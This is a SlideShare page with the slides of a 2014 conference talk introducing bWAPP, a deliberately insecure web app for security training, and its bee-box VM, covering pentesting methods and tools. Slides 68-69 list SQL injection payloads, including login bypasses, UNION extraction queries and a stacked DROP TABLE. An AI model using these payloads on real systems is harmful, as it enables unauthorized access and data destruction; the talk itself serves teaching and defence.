Infosecurity 2014 - Superbees Wanted

505 views

Published on

Event: Infosecurity 2014
Topic: Superbees Wanted
Location: Brussels Expo

0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
505
On SlideShare
0
From Embeds
0
Number of Embeds
8
Actions
Shares
0
Downloads
13
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Infosecurity 2014 - Superbees Wanted

  1. 1. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. What is bWAPP? Malik Mesellem Defense Needed, Superbees Wanted
  2. 2. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. About Me  Malik Mesellem Email | malik@itsecgames.com LinkedIn | be.linkedin.com/in/malikmesellem Twitter | twitter.com/MME_IT Blog | itsecgames.blogspot.com
  3. 3. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. What is bWAPP?  Contents  Defense Needed  bWAPP and bee-box  Web App Pentesting  Exploiting Vulnerabilities  Superbees Wanted
  4. 4. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. What is bWAPP?  Contents  Defense Needed  bWAPP and bee-box  Web App Pentesting  Exploiting Vulnerabilities  Superbees Wanted
  5. 5. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Defense Needed  Web application security is today's most overlooked aspect of securing the enterprise  Hackers are concentrating their efforts on websites and web applications  Web apps are an attractive target for cyber criminality, cyber warfare and hacktivism
  6. 6. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Defense Needed  Why are web applications an attractive target?  Easily available via the Internet (24/7)  Mission-critical business applications with sensitive data  Often direct access to backend data  Traditional firewalls and SSL provide no protection  Many applications are custom-made == vulnerable
  7. 7. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Defense Needed  Why are web applications an attractive target?  Easily available via the Internet (24/7)  Mission-critical business applications with sensitive data  Often direct access to backend data  Traditional firewalls and SSL provide no protection  Many applications are custom-made == vulnerable
  8. 8. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. DEFENSE is needed !
  9. 9. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. What is bWAPP?  Contents  Defense Needed  bWAPP and bee-box  Web App Pentesting  Exploiting Vulnerabilities  Superbees Wanted
  10. 10. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP == defense  bWAPP, or a buggy Web APPlication  Deliberately insecure web application, includes all major known web vulnerabilities  Helps security enthusiasts, developers and students to discover and to prevent issues  Prepares one for successful penetration testing and ethical hacking projects
  11. 11. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP
  12. 12. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP  Web application security is not just installing a firewall, or scanning a site for ‘potential’ issues  Black-box penetration testing, simulating real attack scenarios, is still needed!  Confirms potential vulnerabilities, and excludes false positives  Guarantees that your defense measures are working effectively  bWAPP helps to improve your security-testing skills…
  13. 13. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved.
  14. 14. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP  Testimonials Awesome! It's good to see fantastic tools staying up to date ... - Ed Skoudis Founder of Counter Hack I just installed bWAPP 1.6 into the next release of SamuraiWTF ... Its a great app ... - Justin Searle Managing Partner at UtiliSec Great progress on bWAPP BTW! :) - Vivek Ramachandran Owner of SecurityTube
  15. 15. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP  Architecture  Open source PHP application  Backend MySQL database  Hosted on Linux/Windows with Apache/IIS  Supported on WAMP or XAMPP
  16. 16. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP  Features (1)  Very easy to use and to understand  Well structured and documented PHP code  Different security levels (low/medium/high)  ‘New user’ creation (password/secret)  ‘Reset application/database’ feature  Manual intervention page  Email functionalities
  17. 17. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP  Features (2)  Local PHP settings file  No-authentication mode (A.I.M.)  ‘Evil Bee’ mode, bypassing security checks  ‘Evil’ directory, including attack scripts  WSDL file (Web Services/SOAP)  Fuzzing possibilities
  18. 18. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP  What makes bWAPP so unique?  Well, it has over 70 web bugs!  Covering all major known web vulnerabilities  Including all risks from the OWASP Top 10 project
  19. 19. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP  Which bug do you want to hack today?
  20. 20. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP  Which bug do you want to hack today? (1)  SQL, HTML, SSI, OS Command, XML, XPath, LDAP, PHP Code, Host Header and SMTP injections  Authentication, authorization and session management issues  Malicious, unrestricted file uploads and backdoor files  Arbitrary file access and directory traversals  PHP-CGI remote code execution  Local and remote file inclusions (LFI/RFI)  Server Side Request Forgery (SSRF)
  21. 21. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP  Which bug do you want to hack today? (2)  Configuration issues: Man-in-the-Middle, Cross-Domain policy file, FTP, WebDAV, information disclosures,...  HTTP parameter pollution and HTTP response splitting  XML External Entity attacks (XXE)  HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues  Unvalidated redirects and forwards  Denial-of-Service (DoS) attacks
  22. 22. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP  Which bug do you want to hack today? (3)  Cross-Site Scripting (XSS), Cross-Site Tracing (XST) and Cross-Site Request Forgery (CSRF)  AJAX and Web Services issues (JSON/XML/SOAP)  Parameter tampering and cookie poisoning  HTTP verb tampering  Local privilege escalation  And much more 
  23. 23. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP
  24. 24. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP  External links  Home page - www.itsecgames.com  Download location - sourceforge.net/projects/bwapp  Blog - itsecgames.blogspot.com
  25. 25. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bee-box  Every bee needs a home… the bee-box  VM pre-installed with bWAPP  LAMP environment: Linux, Apache, MySQL and PHP  Compatible with VMware and VirtualBox  Requires zero installation
  26. 26. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bee-box  bee-box is also made deliberately insecure…  Opportunity to explore all bWAPP vulnerabilities  Gives you several ways to hack and deface bWAPP  Even possible to hack the bee-box to get full root access!  Hacking, defacing and exploiting without going to jail  You can download bee-box from here
  27. 27. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bee-box
  28. 28. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bee-box  Features (1)  Apache, MySQL and PHP installed  Several PHP extensions installed  Vulnerable PHP-CGI  phpMyAdmin installed  Postfix installed and configured  Insecure FTP and WebDAV configurations  AppArmor disabled
  29. 29. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bee-box  Features (2)  Weak self-signed SSL certificate  ‘Fine-tuned’ file access permissions  .htaccess files support enabled  Some basic security tools installed  Shortcuts to start, install and update bWAPP  An amazing wallpaper   An outdated Linux kernel…
  30. 30. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP and bee-box  Both are part of the ITSEC GAMES project  A funny approach to IT security education  IT security, ethical hacking, training and fun...  All ingredients mixed together   Educational and recreational InfoSec training
  31. 31. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP and bee-box  Ready, set, and hack!  There’s just one thing to remember  The logon credentials are…
  32. 32. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bee/bug
  33. 33. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP and bee-box  Ready, set, and hack!  There’s just one thing to remember  The logon credentials are bee/bug  So please don’t bug me anymore
  34. 34. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP and bee-box  Installation and configuration  Install VMware Player or Oracle VirtualBox  Extract, install, and start the bee-box VM  Configure or check the IP settings  Browse to the bWAPP web app  http://[IP]/bWAPP/  Login with bee/bug
  35. 35. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP and bee-box  General application settings  settings.php, located under the bWAPP admin folder  Connection settings  SMTP settings  A.I.M. mode  Evil bee mode  Static credentials
  36. 36. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP and bee-box  Settings
  37. 37. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP and bee-box  A.I.M.  Authentication Is Missing, a no-authentication mode  May be used for testing web scanners and crawlers  Procedure  Change the IP address in the settings file  Point your web scanner or crawler to http://[IP]/bWAPP/aim.php  All hell breaks loose…
  38. 38. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. bWAPP and bee-box  Worst-case-scenario-options  Reset the application  http://[IP]/bWAPP/reset.php  Reset the application + database  http://[IP]/bWAPP/reset.php?secret=bWAPP  Reinstall the database  Drop the database from phpMyAdmin  http://[IP]/bWAPP/install.php
  39. 39. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Finally, time for a DEMO
  40. 40. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Demo
  41. 41. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. What is bWAPP?  Contents  Defense Needed  bWAPP and bee-box  Web App Pentesting  Exploiting Vulnerabilities  Superbees Wanted
  42. 42. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Penetration Testing  Penetration testing, or pentesting  Method of evaluating computer, network or application security by simulating an attack  Active analysis of potential vulnerabilities by using ethical hacking techniques  Penetration tests are sometimes a component of a full security audit
  43. 43. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Web App Penetration Testing  Web application pentesting is focusing on evaluating the security of a web application  Application is tested for known web vulnerabilities  Manual, automatic and semi-automatic tests  Source code analysis and web server configuration review as an option
  44. 44. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Web App Penetration Testing  It’s all about identifying, exploiting, and reporting vulnerabilities  Some considerations…  Commercial tools vs. open source tools  Not a best practice to use only one tool  Most commercial scanners don’t exploit  False positives are not allowed!  People don’t like auto-generated reports
  45. 45. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Testing Methodologies  A simple testing methodology
  46. 46. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Testing Methodologies  A more advanced testing methodology
  47. 47. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. OWASP  OWASP, or Open Web Application Security Project  Worldwide non-profit organization focused on improving the security of software  Freely-available articles, methodologies, documentation, tools, and technologies  Vendor neutral, no recommendations for commercial products or services!
  48. 48. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. OWASP  Current OWASP Projects  Top 10 Project and Testing Guide  Development and Code Review Guide  Application Security Verification Standard  Broken Web Applications (BWA)  Zed Attack Proxy (ZAP)
  49. 49. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. OWASP  OWASP Top 10 Project, lists the 10 most severe web application security risks  Constantly updated, latest version released in 2013  Referenced by many standards, books, tools, and organizations, including MITRE and PCI DSS  Good starting point for a web application pentest  What to test? How to test? How to prevent?
  50. 50. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. OWASP  OWASP Top 10 Application Security Risks
  51. 51. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. OWASP  OWASP Top 10 placement
  52. 52. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Introduction to Kali Linux  Kali Linux is a Debian-derived Linux distribution  Designed for digital forensics and penetration testing  Formerly known as BackTrack  Maintained and funded by Offensive Security  Support for x86 and ARM
  53. 53. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Introduction to Kali Linux  Includes many web app pentesting tools  Burp Suite  DirBuster  Metasploit  Nikto  sqlmap  w3af  WebSploit  ZAP
  54. 54. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Intercepting Proxies  Intercepting proxies are testing tools acting as a legitimate Man-in-the-Middle (MitM)  Located between the browser and the web application  Ability to intercept and to modify requests/responses  Provide a historical record of all requests  Include integrated tools to discover vulnerabilities, and to crawl and brute force files and directories
  55. 55. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Intercepting Proxies  ZAP, Zed Attack Proxy  OWASP project, by Simon Bennetts  Java application, released in September 2010  Fork of the Paros intercepting proxy  Pentesting tool for finding vulnerabilities  Provides automated scanning, as well as a set of tools to find security vulnerabilities manually
  56. 56. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Intercepting Proxies  ZAP, Zed Attack Proxy  Functionalities  Intercepting proxy, listening on TCP/8080  Traditional and AJAX spider  Automated and passive scanner  Fuzzing and brute force capabilities  Smartcard and client certificate support  Authentication and session support
  57. 57. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Intercepting Proxies  ZAP, Zed Attack Proxy
  58. 58. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Demo  ZAP, Zed Attack Proxy  Parameter/cookie tampering  Online password attack  Detecting vulnerabilities
  59. 59. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Commercial Web Scanners  Netsparker  Automated ‘false positive free’ web security scanner  Identifies security issues and vulnerabilities such as SQL injection and Cross-Site Scripting (XSS)  Automatically exploits detected vulnerabilities to ensure no false positives are reported  Site: https://www.netsparker.com/
  60. 60. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Commercial Web Scanners
  61. 61. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Commercial Web Scanners  Netsparker
  62. 62. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Ready to Exploit some bugs?
  63. 63. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. What is bWAPP?  Contents  Defense Needed  bWAPP and bee-box  Web App Pentesting  Exploiting Vulnerabilities  Superbees Wanted
  64. 64. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. SQL Injection  SQL injection is very common in web applications  Occurs when user input is sent to a SQL interpreter as part of a query  The attacker tricks the interpreter into executing unintended SQL queries
  65. 65. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. SQL Injection  Injection in the OWASP Top 10
  66. 66. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. SQL Injection  Normal operation DATABASE SQL interpreter WEB APP HTML | SQL BROWSER HTML (GET/POST) login password SELECT * FROM table WHERE login = ‘login’ AND password = ‘password’ result HTML SQL
  67. 67. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. DATABASE SQL interpreter WEB APP HTML | SQL BROWSER HTML (GET/POST) login ’ or 1=1-- SELECT * FROM table WHERE login = ‘login’ AND password = ‘’ or 1=1-- ’ result HTML SQL SQL Injection  Abnormal operation
  68. 68. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. SQL Injection  Simple injections  '--  ' or 'a'='a  ' or 'a'='a'--  ' or '1'='1  ' or 1=1--
  69. 69. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. SQL Injection  Union injections  ' UNION SELECT field1, field2 FROM table--  ' UNION SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=database()--  Stacked queries  '; DROP TABLE table;--
  70. 70. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. SQL Injection
  71. 71. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Demo  SQL Injection  Bypassing login forms  Manually extracting data  Automated SQL injection
  72. 72. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. HTML Injection  HTML injection occurs when a user inserts HTML code via a specific input field or parameter  Insufficient validation of user-supplied data  Dangerous when it is stored permanently!  HTML injections can lead to  Website defacements  Phishing attacks  Client-side exploitation
  73. 73. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Demo  HTML Injection  Website defacement  Phishing attack  Client-side exploitation
  74. 74. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Denial-of-Service  Denial-of-Service attack, or DoS attack  An attacker attempts to prevent legitimate users from accessing the application, server or network  Consumes network bandwidth, server sockets, threads, or CPU resources  Distributed Denial-of-Service attack, or DDoS  Popular techniques used by hacktivists
  75. 75. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Denial-of-Service  Newer layer 7 DoS attacks are more powerful!  “Low-bandwidth application layer DoS”  Advantages of layer 7 DoS  Legitimate TCP/UDP connections, difficult to differentiate from normal traffic  Requires lesser number of connections, possibility to stop a web server from a single attack  Reach resource limits of services, regardless of the hardware capabilities of the server
  76. 76. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Denial-of-Service  Layer 7 DoS methods  HTTP Slow Headers  HTTP Slow POST  HTTP Slow Reading  Apache Range Header  SSL/TLS Renegotiation  XML Bombs
  77. 77. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Demo  Denial-of-Service  HTTP Slow POST  XML Bombs
  78. 78. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Unrestricted File Uploads  Malicious, or Unrestricted File Uploads  File upload flaws occur when an attacker can upload files without any restrictions, or bypassing weak restrictions  The first step in many attacks is to get some code to the system to be attacked!  Using an unrestricted file upload helps the attacker…  The attack only needs to find a way to get the code executed
  79. 79. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Unrestricted File Uploads  Web shells are malicious web pages that provide an attacker functionality on a web server  Making use of server-side scripting languages like PHP, ASP, ASPX, JSP, CFM, Perl,...  Web shell functionalities  File transfer  Command execution  Network reconnaissance  Database connectivity
  80. 80. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Unrestricted File Uploads  External attack vectors for using web shells  Unrestricted File Uploads  Remote File Inclusion  SQL Injection  OS Command Injection  Insecure FTP, WebDAV,…
  81. 81. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Demo  Unrestricted File Uploads  Shell access  Escalating privileges...  Getting r00t access!
  82. 82. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. What is bWAPP?  Contents  Defense Needed  bWAPP and bee-box  Web App Pentesting  Exploiting Vulnerabilities  Superbees Wanted
  83. 83. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved.  And we have so much more bugs to exploit…  It’s definitely time to improve your web security  Defense is needed, and testing is required!  Downloading bWAPP is a first start  Remember: every bee needs a superbee  Are you that superbee? Superbees Wanted @MME_IT #bWAPP
  84. 84. What is bWAPP? | © 2014 Malik Mesellem, all rights reserved. Contact Me  Malik Mesellem Email | malik@itsecgames.com LinkedIn | be.linkedin.com/in/malikmesellem Twitter | twitter.com/MME_IT Blog | itsecgames.blogspot.com

×